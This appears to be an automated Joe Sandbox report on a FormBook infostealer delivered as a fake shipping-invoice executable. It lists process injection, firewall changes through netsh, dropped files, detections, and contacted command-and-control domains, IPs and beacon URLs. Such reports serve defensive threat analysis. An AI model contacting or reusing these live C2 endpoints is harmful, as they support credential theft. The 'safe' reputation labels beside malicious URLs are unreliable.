          Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10008C6C cpuid 1_2_10008C6C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,1_2_10008A23
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_10004896
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection612Obfuscated Files or Information3Security Account ManagerSystem Information Discovery124SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Install Root Certificate1NTDSSecurity Software Discovery251Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection612Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRundll321Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323227 Sample: Shipping INVOICE-BL Shipment..exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 40 www.mapnimbis.com 2->40 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Multi AV Scanner detection for dropped file 2->60 62 5 other signatures 2->62 12 Shipping INVOICE-BL Shipment..exe 54 2->12         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\...\Prehnite.dll, PE32 12->32 dropped 34 C:\Users\user\AppData\Roaming\...\vjscsvr.exe, PE32 12->34 dropped 36 C:\Users\user\AppData\...\rcxditui.dll, PE32 12->36 dropped 38 8 other files (none is malicious) 12->38 dropped 15 rundll32.exe 12->15         started        process6 signatures7 72 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 15->72 74 Hijacks the control flow in another process 15->74 76 Maps a DLL or memory area into another process 15->76 18 cmd.exe 15->18         started        process8 signatures9 48 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 18->48 50 Modifies the context of a thread in another process (thread injection) 18->50 52 Maps a DLL or memory area into another process 18->52 54 3 other signatures 18->54 21 explorer.exe 18->21 injected process10 dnsIp11 42 www.wtmailer15.com 75.126.100.11, 49769, 80 SOFTLAYERUS United States 21->42 44 wastie.club 95.215.210.10, 49770, 80 NEWIT-ASRU Russian Federation 21->44 46 16 other IPs or domains 21->46 64 System process connects to network (likely due to code injection or exploit) 21->64 25 netsh.exe 21->25         started        signatures12 process13 signatures14 66 Modifies the context of a thread in another process (thread injection) 25->66 68 Maps a DLL or memory area into another process 25->68 70 Tries to detect virtualization through RDTSC time measurements 25->70 28 cmd.exe 1 25->28         started        process15 process16 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Shipping INVOICE-BL Shipment..exe28%VirustotalBrowse
          Shipping INVOICE-BL Shipment..exe45%ReversingLabsWin32.Trojan.Woreflint

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll2%ReversingLabs
          C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\Prehnite.dll28%ReversingLabsWin32.Trojan.Wacatac
          C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe3%ReversingLabs
          C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.cmd.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.Shipping INVOICE-BL Shipment..exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.Shipping INVOICE-BL Shipment..exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jddq888.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc51760%Avira URL Cloudsafe
          http://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS0%Avira URL Cloudsafe
          http://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.wastie.club/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly0%Avira URL Cloudsafe
          http://www.caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.thelonerangernews.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.gettingthehelloutofca.com/mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y00%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.wtmailer15.com/mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y00%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.businessobjects.com00%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.hvcharging.com/mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y00%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.wtmailer15.com
          		75.126.100.11
          		truetrue
            		unknown
            gettingthehelloutofca.com
            		34.102.136.180
            		truetrue
              		unknown
              carnesveymacr.com
              		192.0.78.24
              		truetrue
                		unknown
                hvcharging.com
                		34.102.136.180
                		truetrue
                  		unknown
                  mehler.photography
                  		192.0.78.24
                  		truetrue
                    		unknown
                    caelaabadie.com
                    		165.227.229.15
                    		truetrue
                      		unknown
                      thelonerangernews.com
                      		34.102.136.180
                      		truetrue
                        		unknown
                        wastie.club
                        		95.215.210.10
                        		truetrue
                          		unknown
                          www.mapnimbis.com
                          		45.33.2.79
                          		truefalse
                            		unknown
                            jddq888.com
                            		23.88.85.105
                            		truetrue
                              		unknown
                              www.caelaabadie.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.uyieoamejus2zd.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.wastie.club
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.mehler.photography
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.jddq888.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.carnesveymacr.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.thelonerangernews.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.gettingthehelloutofca.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.hvcharging.com
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.jddq888.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaStrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wastie.club/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYlytrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19atrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.thelonerangernews.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHGtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.gettingthehelloutofca.com/mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wtmailer15.com/mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.hvcharging.com/mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://openoffice.org/2001/block-listnse53A7.tmp.0.drfalse
                                                            		high
                                                            http://www.tiro.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://nsis.sf.net/NSIS_ErrorErrorShipping INVOICE-BL Shipment..exefalse
                                                                		high
                                                                http://www.goodfont.co.krexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.carterandcone.comlexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.typography.netDexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://fontfabrik.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://nsis.sf.net/NSIS_ErrorShipping INVOICE-BL Shipment..exefalse
                                                                      		high
                                                                      http://www.freedesktop.org/standards/shared-mime-infonse53A7.tmp.0.drfalse
                                                                        		high
                                                                        http://www.businessobjects.com0nse53A7.tmp.0.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.%s.comPAexplorer.exe, 00000004.00000000.693351563.0000000002B50000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		low
                                                                          http://www.fonts.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.sandoll.co.krexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.sakkal.comexplorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown

                                                                            Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            192.0.78.24
                                                                            		unknownUnited States
                                                                            		2635AUTOMATTICUStrue
                                                                            95.215.210.10
                                                                            		unknownRussian Federation
                                                                            		49055NEWIT-ASRUtrue
                                                                            165.227.229.15
                                                                            		unknownUnited States
                                                                            		14061DIGITALOCEAN-ASNUStrue
                                                                            34.102.136.180
                                                                            		unknownUnited States
                                                                            		15169GOOGLEUStrue
                                                                            23.88.85.105
                                                                            		unknownUnited States
                                                                            		18978ENZUINC-UStrue
                                                                            75.126.100.11
                                                                            		unknownUnited States
                                                                            		36351SOFTLAYERUStrue

                                                                            General Information

                                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                                            Analysis ID:323227
                                                                            Start date:26.11.2020
                                                                            Start time:15:06:20
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 9m 2s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Sample file name:Shipping INVOICE-BL Shipment..exe
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:15
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@9/27@11/6
                                                                            EGA Information:Failed
                                                                            HDC Information:
                                                                            • Successful, ratio: 69.3% (good quality ratio 63.9%)
                                                                            • Quality average: 72.3%
                                                                            • Quality standard deviation: 31.2%
                                                                            HCA Information:
                                                                            • Successful, ratio: 82%
                                                                            • Number of executed functions: 100
                                                                            • Number of non-executed functions: 120
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            • Found application associated with file extension: .exe
                                                                            Warnings:
                                                                            Show All
                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.255.188.83, 104.43.193.48, 51.104.139.180, 20.54.26.129, 52.155.217.156, 8.241.121.254, 8.248.117.254, 67.26.83.254, 67.26.73.254, 67.26.81.254
                                                                            • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            15:07:26API Interceptor20x Sleep call for process: cmd.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            192.0.78.24dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                            • www.lostintraveland.com/nt8e/?wfv=VbtcqB+EWbxdZOX/9YxeVA6owrwkM55mfLmzDpPytykHKv5w+HQ2tOlnH/hPksabIPhH&Tj=yrIt
                                                                            jtFF5EQoEE.exeGet hashmaliciousBrowse
                                                                            • www.pamforprogress.com/bg8v/?YvuLylfp=DPerEW6C5mmZA0l94jTYzByN7CgGbRpDXVp6aOkaUr5qiBkcUA6mjjfpS5thmS0etuhe0Le2iw==&EZ6tXv=jfFD8XLPm
